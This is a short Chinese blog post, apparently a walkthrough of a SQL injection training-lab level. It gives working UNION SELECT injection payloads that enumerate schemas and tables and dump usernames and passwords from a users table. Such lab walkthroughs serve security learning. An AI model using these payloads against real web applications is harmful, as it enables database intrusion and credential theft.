标签:name weight color order tables 直接 -- format inf
and 1=1有回显,and 1=2无回显,为数值型注入
order by 4–+报错,有3行
查询数据库名
?id=0‘ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
查询列名
?id=0 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security‘)--+
查询账号密码
?id=0 union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+
这里因为跟第一关大同小异,字段类型都是一样的,可以直接用exp去爆
exp:?id=-1 union SELECT 1,2,(select group_concat(username,0x3a,password) from users)--+
这里解释一下0x3a的用途:把账号和密码整合到一起更直观的显示
标签:name weight color order tables 直接 -- format inf
原文地址:https://www.cnblogs.com/messi996/p/14533778.html
